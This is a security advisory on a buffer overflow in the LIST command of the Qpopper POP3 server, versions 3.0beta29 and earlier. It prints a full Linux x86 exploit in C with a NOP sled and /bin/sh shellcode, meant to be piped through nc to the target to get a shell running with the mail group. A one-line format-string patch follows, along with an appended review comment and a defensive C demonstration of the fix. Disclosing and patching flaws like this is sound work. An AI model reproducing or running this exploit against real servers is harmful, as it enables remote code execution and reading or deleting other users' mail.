COMMAND

    qpopper

SYSTEMS AFFECTED

    Qpopper <= 3.0beta29 (2.53 and older are not vulnerable)

PROBLEM

    'Zhodiac' found the following.  The nowadays so common qpop pop3
    server is one of the best servers, implementing some features not
    found in a normal pop3d.  Like almost all software it has some
    security bugs.  In this case, once you pass the login process you
    can execute malicious code due to a buffer overflow.

    With this buffer overflow (in the second argument of the LIST
    command) you can execute malicious code with the uid of the user
    you logged in as, and with gid mail.  Because of the gid mail, on
    some systems you can read all the mail of other users and even
    change/delete it.

    As proof of the vulnerability, here's the Linux x86 xploit.  But be
    aware: no public xploit for your system does not mean you can't be
    hacked.  The vulnerability exists, fix it!

    /*
     * !Hispahack Research Team
     * http://hispahack.ccc.de
     *
     * By Zhodiac <zhodiac@softhome.net>
     *
     * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
     * Overflow at pop_list()->pop_msg()
     *
     * Tested: 3.0beta28  offset=0
     *         3.0beta26  offset=0
     *         3.0beta25  offset=0
     *
     * #include <standar/disclaimer.h>
     *
     * This code is dedicated to my love [CrAsH]] and to all the people who
     * were raided in Spain in the last few days.
     *
     * Madrid 10/1/2000
     *
     */
    
    #include <stdio.h>
    #include <stdlib.h>     /* exit(), atol() */
    #include <string.h>     /* memset(), memcpy(), strlen() */
    #include <unistd.h>     /* sleep() */
    #include <stdint.h>     /* uint32_t: the return address is a 32-bit x86 pointer */
    
    #define BUFFERSIZE 1004
    #define NOP 0x90
    #define OFFSET 0xbfffd9c4
    
    char shellcode[]=
     "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
     "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
     "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";
    
    
    void usage(char *progname) {
     fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110\n",progname);
     exit(1);
    }
    
    int main(int argc, char **argv) {
    char *ptr,buffer[BUFFERSIZE+1];   /* +1 leaves room for the terminating NUL */
    uint32_t *long_ptr,offset=OFFSET;
    int aux;
    
     fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
     fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");
    
     if (argc<3) usage(argv[0]);
    
     if (argc==4) offset+=atol(argv[3]);
    
     /* Buffer layout: NOP sled, then the shellcode, then 4 copies of the address */
     ptr=buffer;
     memset(ptr,0,sizeof(buffer));
     memset(ptr,NOP,BUFFERSIZE-strlen(shellcode)-16);
     ptr+=BUFFERSIZE-strlen(shellcode)-16;
     memcpy(ptr,shellcode,strlen(shellcode));
     ptr+=strlen(shellcode);
     long_ptr=(uint32_t*)ptr;
     for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
     ptr=(char *)long_ptr;
     *ptr='\0';
    
     fprintf(stderr,"Buffer size: %zu\n",strlen(buffer));
     fprintf(stderr,"Offset: 0x%lx\n\n",(unsigned long)offset);
    
     printf("USER %s\n",argv[1]);
     sleep(1);
     printf("PASS %s\n",argv[2]);
     sleep(1);
     printf("LIST 1 %s\n",buffer);
     sleep(1);
     printf("uname -a; id\n");
    
     return(0);
    }

SOLUTION

    The best solution is to wait for a new patched version.  Meanwhile,
    here you have a patch that will stop this attack (be aware that this
    patch was not done after a total revision of the code, so there may
    be other overflows).

        77c77
        <               return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %s",
        ---
        >               return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %.128s",
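Review bot: the hunk carries no file header, so a reader cannot tell which source file line 77 belongs to; give the path in the diff header. The `%.128s` precision also fixes only this one call site: the overflow is reported at pop_list()->pop_msg(), so pop_msg() still formats whatever its other callers pass into its reply buffer, and any further unbounded `%s` reaching it (the advisory itself warns there may be other overflows) stays exploitable. Consider bounding the formatting inside pop_msg() against the reply buffer size in addition to this cap.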
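The fix above relies on a printf precision to bound the client-controlled argument. As an added example (not qpopper's code), this C stand-in for pop_msg() formats both the unpatched and the patched format string into a fixed 256-byte reply buffer and returns the length each message would need; the buffer size and the "-ERR " prefix are assumptions, and the 1004-byte argument is constructed to match the exploit's buffer.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_BUF 256              /* assumed reply buffer size; not qpopper's */

static char reply[REPLY_BUF];      /* fixed-size reply buffer, as a daemon keeps */

/* Hypothetical stand-in for pop_msg(): formats the reply with vsnprintf so
 * the buffer itself cannot overflow, and returns the length the complete
 * message would have had.  A result >= REPLY_BUF means it was truncated. */
static int format_reply(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(reply, sizeof reply, fmt, ap);
    va_end(ap);
    return n;
}

/* Unpatched format ("-ERR " prefix assumed): the client-supplied argument
 * is copied in full, so whoever sent the LIST command controls the length. */
int list_error_unpatched(const char *arg)
{
    return format_reply("-ERR Unknown LIST argument: %s", arg);
}

/* Patched format from the advisory: ".128" caps the argument at 128 bytes,
 * so the message never needs more than 28 + 128 bytes whatever was sent. */
int list_error_patched(const char *arg)
{
    return format_reply("-ERR Unknown LIST argument: %.128s", arg);
}

/* Length of what actually landed in the reply buffer. */
size_t reply_len(void)
{
    return strlen(reply);
}

/* Constructed input: a LIST argument as long as the exploit's buffer. */
const char *long_list_arg(void)
{
    static char arg[1005];
    memset(arg, 'A', 1004);
    arg[1004] = '\0';
    return arg;
}
```

With the long argument the unpatched format reports 1032 bytes needed (truncated to 255 in the buffer), while the patched one settles at 156 regardless of the argument length.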